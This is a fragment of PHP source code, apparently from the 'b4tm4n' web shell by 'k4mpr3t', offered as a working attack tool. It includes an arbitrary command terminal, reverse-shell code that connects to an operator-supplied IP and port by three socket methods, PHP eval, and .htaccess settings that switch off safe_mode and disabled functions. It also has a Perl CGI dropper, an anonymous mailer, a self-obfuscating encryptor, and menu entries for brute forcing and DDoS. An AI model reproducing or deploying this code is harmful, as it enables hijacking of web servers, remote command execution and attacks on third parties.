$return.="\n\n".$row2[1].";\n\n"; if ($num_rows!==0) { $row3=@mysqli_fetch_fields($result); $return.='INSERT INTO '.$table.'( '; foreach ($row3 as $th) { $return.='`'.$th->name.'`,'; } $return=substr($return,0,-2); $return.=' ) VALUES'; for ($i=0;$i < $num_fields;$i++) { while($row=mysqli_fetch_row($result)) { $return.="\n("; for($j=0;$j<$num_fields;$j++) { $row[$j]=addslashes($row[$j]); $row[$j]=preg_replace("#\n#","\\n",$row[$j]); if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';} if ($j<($num_fields-1)) { $return.=',';} } if (++$i_row==$num_rows) { $return.=");"; }else { $return.="),"; } } } } $return.="\n\n\n"; } $return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n"; $return.='COMMIT;'; $output=end(explode(".",$output))=='sql'?$output:$output.'.sql'; $handle=fopen($output,'w+'); fwrite($handle,$return); fclose($handle); $_SESSION['status']=sprintf("Dump with success... '%s'",urle($output),basename($output)); } else { $_SESSION['status']="Dump Error"; } header('location:'.php_self.'?x=db'); } } if($_REQUEST['x']=="terminal") { printf("
    ",Execute('whoami'),$dir); if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals") { ob_clean(); $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami"; @chdir($dir); $charset='UTF-8'; if(!Unix()) { $charset='Windows-1251'; } $ret=iconv($charset,'UTF-8',Execute($command)); print $ret; exit; } elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir") { ob_clean(); $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami"; if (preg_match('/cd (.*)/',$command,$dirx)) { if ($dirx[1]=='..') { $dir=substr($dir,0,strrpos($dir,_)); if (strlen($dir)<=2) $dir=$dir._; } else { if (is_dir($dirx[1])) { $dir=realpath($dirx[1]); } } } $_SESSION['c']=urle($dir); print '$ '.$dir.':'; exit; } } if($_REQUEST['x']=="connect") { printf("
    Reverse Connect



    Status
    Terminal: %s", remote_addr,Execute('whoami') ); if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="reverse-connect") { if($_REQUEST['socket']=="fsockopen") { $host=$_REQUEST['reverse-ip']; $port=$_REQUEST['reverse-port']; $sock=@fsockopen($host,$port,$errno,$errstr); if($errno!=0) { printf("%s:%s",$errno,$errstr); } else { while(!feof($sock)) { fwrite($sock,"[b4tm4n]:"); $command=fgets($sock,1024); if(trim($command)=='quit'||trim($command)=='exit') { fclose($sock); printf($command); exit; } fwrite($sock,Execute($command)); } fclose($sock); } } else if($_REQUEST['socket']=="socket_create") { $host=$_REQUEST['reverse-ip']; $port=$_REQUEST['reverse-port']; $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_set_nonblock($sock); if(!$sock) { printf("Connection Error"); } else { while(!@socket_connect($sock,$host,$port)) { @socket_write($sock,"[b4tm4n]:",strlen ("[b4tm4n]:")); $input=@socket_read($sock,1024,PHP_NORMAL_READ); if (trim($input)=='quit'||trim($input)=='exit') { socket_set_block($sock); socket_close($sock); printf($input); exit; } @socket_write($sock,Execute($input),strlen (Execute($input))); } socket_set_block($sock); socket_close($sock); } } else if($_REQUEST['socket']=="stream_socket_client") { $host=$_REQUEST['reverse-ip']; $port=$_REQUEST['reverse-port']; $sock=@stream_socket_client("tcp://$host:$port",$errno,$errstr); if (!$sock) { printf("%s:%s",$errno,$errstr); } else { while(!feof($sock)) { fwrite($sock,"[b4tm4n]:"); $command=fgets($sock,1024); if(trim($command)=='quit'||trim($command)=='exit') { fclose($sock); printf($command); exit; } fwrite($sock,Execute($command)); } fclose($sock); } } } printf("
    "); } if($_REQUEST['x']=="htaccess") { $php_ini=array( "php_value upload_max_filesize 32M", "php_value post_max_size 32M", "php_flag safe_mode Off", "php_value disable_functions null", "php_flag safe_mode_gid Off", "php_value open_basedir $dir", "php_flag register_globals On", "php_flag exec On", "php_flag shell_exec On"); $htaccess=array( "Options All", "Allow From All", "Satisfy Any"); printf("
    ",implode($php_ini,"\n"),implode($htaccess,"\n")); } if($_REQUEST['x']=="php") { $exp=array( "print_r(get_extension_funcs('Core'));", "print_r(get_loaded_extensions());", "print_r(ini_get_all('pcre'));", "print_r(ini_get_all());", "print_r(get_defined_constants());", "print_r(get_defined_functions());", "print_r(get_declared_classes());"); printf("
    ",implode($exp,"\n")); if(any("code",$_REQUEST)) { ob_clean(); $code=trim($_REQUEST['code']); $evil=Evil($code); exit; } if(any("codex",$_REQUEST)) { ob_clean(); $code=trim($_REQUEST['codex']); $evil=Evil($code,true); exit; } } if($_REQUEST['x']=="perl") { print 'PHP Perl Class: '.(class_exists('Perl')?"ON":"OFF").'
    '; if(Unix()) { if(file_exists("/usr/bin/perl")) { $path_perl="/usr/bin/perl"; } else { $path_perl="/usr/bin/env perl"; } } else { if(file_exists("C:\\perl\bin\perl.exe")) { $path_perl="C:\\perl\bin\perl.exe"; } elseif(file_exists("C:\\wamp\bin\perl.exe")) { $path_perl="C:\\wamp\bin\perl.exe"; } elseif(file_exists("C:\\xampp\perl\bin\perl.exe")) { $path_perl="C:\\xampp\perl\bin\perl.exe"; } } $script=array( "#!$path_perl", "use strict;", "use warnings;", "use CGI;", "print CGI::header();", "print 'k4mpr3t on CGI';"); $htaccess=array( "Options +ExecCGI +SymLinksIfOwnerMatch", "DirectoryIndex index.ler", "AddType application/x-httpd-cgi .ler", "AddHandler cgi-script .ler"); $path=$dir._.'cgi-bin'; $file=$path._.'perl.ler'; $file2=$path._.'.htaccess'; $scripts=implode($script,"\n"); $htaccesss=implode($htaccess,"\n"); if(!is_dir($path)) { mkdir($path,0755); } if(!is_file($file)) { $op=fopen($file,'w+'); fwrite($op,$scripts); fclose($op); chmod($file,0755); } if(!is_file($file2)) { $op=fopen($file2,'w+'); fwrite($op,$htaccesss); fclose($op); chmod($file2,0755); } $redirect=GetUrlFromPath($file); printf("Tested -> Link"); if (class_exists('Perl')) { //$perl=Perl::getInstance(); $perl=new Perl(); $perl->eval("print \"Executing Perl code in PHP\n\""); print "Hello from PHP! "; //$perl=new Perl(); $perl->require($file); $val=$perl->somePhpFunc('test'); print $val; } } if($_REQUEST['x']=="mail") { printf("
    Mail








    Result's
    ",php_self); if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send') { ob_clean(); $from=$_REQUEST['from']; $reply=$_REQUEST['reply']; $to=$_REQUEST['to']; $cc=$_REQUEST['cc']; $bcc=$_REQUEST['bcc']; $subject=$_REQUEST['subject']; $msg=$_REQUEST['message']; $attachment=$_REQUEST['attachment']; $uid=md5(uniqid(time())); $headers[]="From: $from"; $headers[]="Reply-To: $reply"; $headers[]="To: $to"; if(!empty($cc)) $headers[]='Cc: $cc'; if(!empty($bcc)) $headers[]='Bcc: $bcc'; $headers[]="MIME-Version: 1.0"; $headers[]="Content-Type: multipart/mixed; boundary=\"$uid\""; $messages[]="--$uid"; $messages[]="Content-type: text/html; charset=\"iso-8859-1\""; $messages[]="Content-Transfer-Encoding: 8bit"; $messages[]=""; $messages[]="$msg"; $messages[]=""; if(is_file($attachment)) { $content=file_get_contents($attachment); $content=chunk_split(base64_encode($content)); $name=basename($attachment); $mime=mime_content_type($attachment); $messages[]="--$uid"; $messages[]="Content-Type: $mime; name=\"$name\""; $messages[]="Content-Transfer-Encoding: base64"; $messages[]="Content-Disposition: attachment"; $messages[]=""; $messages[]="$content"; $messages[]=""; $messages[]="--$uid--"; } $message=implode("\r\n",$messages); $header=implode("\r\n",$headers); if(mail($to,$subject,$message,$header)) { print "Email Send"; } else { $error=error_get_last(); print "Error :" . $error['message']; } exit; } } if($_REQUEST['x']=='process') { printf("

    "); if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill") { $pid=$_REQUEST['pid']; $name=$_REQUEST['name']; if(Unix()) { $kill=Execute("kill 9 $pid"); $kill=Execute("kill 9 $name"); if($kill) print 'Process Killed'; } else { $kill=Execute("taskkill /f /pid $pid"); $kill=Execute("taskkill /f /im $name"); if($kill) print 'Process Killed'; } } if(Unix()) { $ret=iconv('UTF-8','UTF-8',Execute('ps aux')); print '
    '.$ret.'
    '; } else { $ret=iconv('Windows-1251','UTF-8',Execute('tasklist')); print '
    '.$ret.'
    '; } } if($_REQUEST['x']=='shells') { print "Coming Soon"; } if($_REQUEST['x']=='symlink') { print "Coming Soon"; } if($_REQUEST['x']=="account") { printf("


    ",B64D($account[0])); if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change") { $filename=script_filename; $username=$_REQUEST['change-password']; $password=$_REQUEST['change-username']; if (!empty($username)&&!empty($password)) { $user_from=$account[0]; $user_to=B64E($password); $content=file_get_contents($filename); $chunk=explode($user_from,$content); $content=implode($user_to,$chunk); $change=file_put_contents($filename,$content); $pass_from=$account[1]; $pass_to=sha1(md5($username)); $content=file_get_contents($filename); $chunk=explode($pass_from,$content); $content=implode($pass_to,$chunk); $change=file_put_contents($filename,$content); if($change) { session_destroy(); session_regenerate_id(); header('location:'.php_self); } else { printf("Error change account"); } } else { printf("Mistakes !"); } } } if($_REQUEST['x']=="action") { $files=any('chk',$_REQUEST)?$_REQUEST['chk']:array(); $value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option']; $tmp=""; $row=""; $count_dirs=0; $count_files=0; foreach($files as $file) { if(is_dir(urld($file))) { $count_dirs++; } if(is_file(urld($file))) { $count_files++; } $row.="".urld($file).""; $tmp.=urld($file).","; } if(count($files)==1&&$value=='copy') { header('location:'.php_self.'?a=cp&r='.$files[0]); } if(count($files)==1&&$value=='move') { header('location:'.php_self.'?a=mv&r='.$files[0]); } if(!any('xa',$_REQUEST)&&$value=='delete') { printf("

    Dir's: [%s] File's: [%s]

    %s
    ", $count_dirs, $count_files, $row, $value, $tmp); } if(!any('xa',$_REQUEST)&&$value!='delete') { printf("

    Dir's: [%s] File's: [%s]

    %s
    ->
    ", $count_dirs, $count_files, $row, $value, $tmp, $dir._); } if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option') { $files=array_filter(explode(',',$_REQUEST['tmp'])); $newloc=trim(@$_REQUEST['newloc']); $succ=0; $fail=0; if($_REQUEST['action-option']=='copy') { if(file_exists($newloc)&&is_dir($newloc)) { foreach($files as $file) { if(CopyRecursive($file,rtrim($newloc,_)._.basename($file))) { $succ++; } else { $fail++; } } print "Success: $succ | Failed: $fail"; } else { print "Target not exists !"; } } if($_REQUEST['action-option']=='move') { if(file_exists($newloc)&&is_dir($newloc)) { foreach($files as $file) { if(MoveRecursive($file,rtrim($newloc,_)._.basename($file))) { $succ++; } else { $fail++; } } print "Success: $succ | Failed: $fail"; } else { print "Target not exists !"; } } if($_REQUEST['action-option']=='delete') { foreach($files as $file) { if(Remove($file)) { $succ++; } else { $fail++; } } print "Success: $succ | Failed: $fail"; } if($_REQUEST['action-option']=='zip') { if(end(explode(".",$newloc))=='zip') { $zip=new ZipArchive; if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE) { foreach($files as $file) { if(is_dir($file)) { $zip->addEmptyDir(basename($file)); $recur=new RecursiveIteratorIterator( new RecursiveDirectoryIterator($file), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($recur as $key => $val) { if(basename($key)!="..") { if(is_dir($key)) { $zdir=str_replace($file,basename($file),realpath($key)); $zip->addEmptyDir($zdir); } elseif(is_file($key)) { $zfile=str_replace($file,basename($file),realpath($key)); $zip->addFile(realpath($key),$zfile); } } } } elseif(is_file($file)) { $zip->addFile($file,basename($file)); } } $zip->close(); print 'Zip Created'; } else { print 'Failed'; } } else { print 'Extension must Zip'; } } if($_REQUEST['action-option']=='unzip') { if(file_exists($newloc)&&is_dir($newloc)) { foreach($files as $file) { if(end(explode(".",$file))=='zip') { $zip=new ZipArchive; if ($zip->open($file)===TRUE) { $zip->extractTo($newloc); $zip->close(); $succ++; } else { $fail++; } } else { $fail++; } } print "Success: $succ | Failed: $fail"; } else { print "Target not exists !"; } } } } if($_REQUEST['x']=="find") { $recur=new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir), RecursiveIteratorIterator::LEAVES_ONLY ); if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value'])) { $result=""; $res_=0; foreach ($recur as $key => $val) { if(basename($key)!="..") { if(strpos(realpath($key),$_REQUEST['find-value'])!== false) { $result.=sprintf(" %s %s
    %s
    ", substr(realpath($key),0,strrpos(realpath($key),_)), substr(realpath($key),0,strrpos(realpath($key),_)), substr(realpath($key),0,strrpos(realpath($key),_)), realpath($key), realpath($key), basename(realpath($key)), GetFileTime(realpath($key),'modify') ); $res_++; } } } printf("
    %s
    No. Directory Name Modified
    ",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result); } else { print "
    "; } } if($_REQUEST['x']=="update") { $link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php'; $current_version=2.6; //New Version Released if($config['debug']==true) { $latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1 } else { $git_script=GetUrlContent($link_update); $get_version=strpos($git_script,"current_version"); $version=substr($git_script,$get_version+16,3); $latest_version=is_numeric($version)?$version:$current_version; } $status=""; if((float)$latest_version>(float)$current_version) { if($config['debug']==true) { $status.='New Version Available '.$latest_version.'
    Setting Debug to False for Activate this Feature'; } else { $status.='New Version Available '.$latest_version.'
    Download -> [link]'; } } else { $status.='Latest Version '.$current_version; } Printf("


    %s
    ",$status); } if($_REQUEST['x']=="self-encryptor") { if($php_script=htmlentities(@file_get_contents(__FILE__))) { $asu=strpos($php_script,$_SESSION["action"]["password"]); $temp=substr($php_script,$asu+48); $rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3)); $rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5)); $b64=array( '"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"', 'strrev("ed"."oce"."d_4"."6es"."ab")', 'strrev("e"."doc"."ed_"."46e"."sab")', '"b"."as"."e6"."4_"."d"."ec"."o"."de"', '"ba"."se"."6"."4_d"."e"."cod"."e"' ); $rand_b64=array_rand($b64); $rand3=$b64[$rand_b64]; $var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";'; $var2=$rand2.'='.$rand3.';'; $var=array( $var1.$var2, $var2.$var1 ); $rand_var=array_rand($var); $rand4=$var[$rand_var]; $self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random $src_=''; $src_.=''; $name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php'; $file=dirname(__FILE__)._.$name; $op=fopen($file,'w+'); fwrite($op,$src_); fclose($op); printf("
    SELF ENCRYPT CREATED !!!
    Link -> %s
    ",GetUrlFromPath($file),$name); } else { print "
    SELF ENCRYPT ENABLE !!!
    "; } } } /* START CUSTOM TOOLZ */ if(any("z",$_REQUEST)) { $z=$_REQUEST['z']; print MenuTools(array( "target-map"=>array("title"=>"Target Map","ver"=>"1.0","auth"=>"k4mpr3t"), "port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"), "script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"), "encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"), "form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"), "login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"), "mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"), "ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"), )); print "
    "; if(empty($z)) { printf("

    Nothing Is Secure...

    WHY SO serious ?!

    "); } if($z=="target-map") { print "

    ".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."

    by: ".$menu_tools[$z]['auth']."

    "; printf("

    ",gethostbyname(http_host)); if(any("ip",$_REQUEST)) { ob_clean(); $ip=!empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host); $valid=filter_var($ip,FILTER_VALIDATE_IP) or die('Invalid IP Address'); if($_REQUEST['ip']==gethostbyname(http_host)) { $url=B64D("zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt=="); $geoip=GetUrlContent($url); $json=json_decode($geoip,true); $ip=$json['query']; } $url=sprintf(B64D("zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt==")."/%s",$ip); $geoip=GetUrlContent($url); $json=json_decode($geoip,true); $url=sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa")."?q=%s,%s&z=10&output=embed",$json['latitude'],$json['longitude']); printf("

    %s (%s) | %s, %s